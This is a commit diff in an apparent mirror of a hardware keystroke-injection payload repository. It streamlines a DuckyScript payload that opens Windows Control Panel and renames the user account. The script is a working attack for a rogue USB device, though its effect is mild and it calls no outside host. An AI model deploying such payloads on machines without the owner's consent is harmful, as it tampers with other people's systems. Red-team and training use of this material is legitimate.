mirror of https://github.com/hak5/omg-payloads.git
Update payload.txt
parent
7ccf84a6cf
commit
d140cd8a9b
|
@ -17,39 +17,25 @@ REM - Payload tested on Windows 11 Eng
|
||||||
REM Set the new name that you want to set
|
REM Set the new name that you want to set
|
||||||
DEFINE NEW_NAME example
|
DEFINE NEW_NAME example
|
||||||
|
|
||||||
|
DEFAULT_DELAY 500
|
||||||
REM Open Windows research
|
REM Open Windows research
|
||||||
DELAY 2000
|
|
||||||
GUI
|
GUI
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
|
|
||||||
REM Search and opern explorer app
|
REM Search and opern explorer app
|
||||||
STRING explorer
|
STRINGLN explorer
|
||||||
ENTER
|
|
||||||
DELAY 1000
|
|
||||||
|
|
||||||
REM Goto search bar and open User Accounts settings
|
REM Goto search bar and open User Accounts settings
|
||||||
TAB
|
REPEAT 3 TAB
|
||||||
DELAY 500
|
|
||||||
TAB
|
|
||||||
DELAY 500
|
|
||||||
TAB
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
DELAY 500
|
|
||||||
STRING Control Panel\All Control Panel Items\User Accounts
|
|
||||||
ENTER
|
ENTER
|
||||||
|
STRINGLN Control Panel\All Control Panel Items\User Accounts
|
||||||
DELAY 1500
|
DELAY 1500
|
||||||
|
|
||||||
REM Goto "Change you account name"
|
REM Goto "Change you account name"
|
||||||
TAB
|
TAB
|
||||||
DELAY 500
|
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 500
|
|
||||||
|
|
||||||
STRING NEW_NAME
|
STRING NEW_NAME
|
||||||
DELAY 500
|
|
||||||
TAB
|
TAB
|
||||||
DELAY 500
|
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 1000
|
|
||||||
ALT F4
|
ALT F4
|
||||||
|
|
Loading…
Reference in New Issue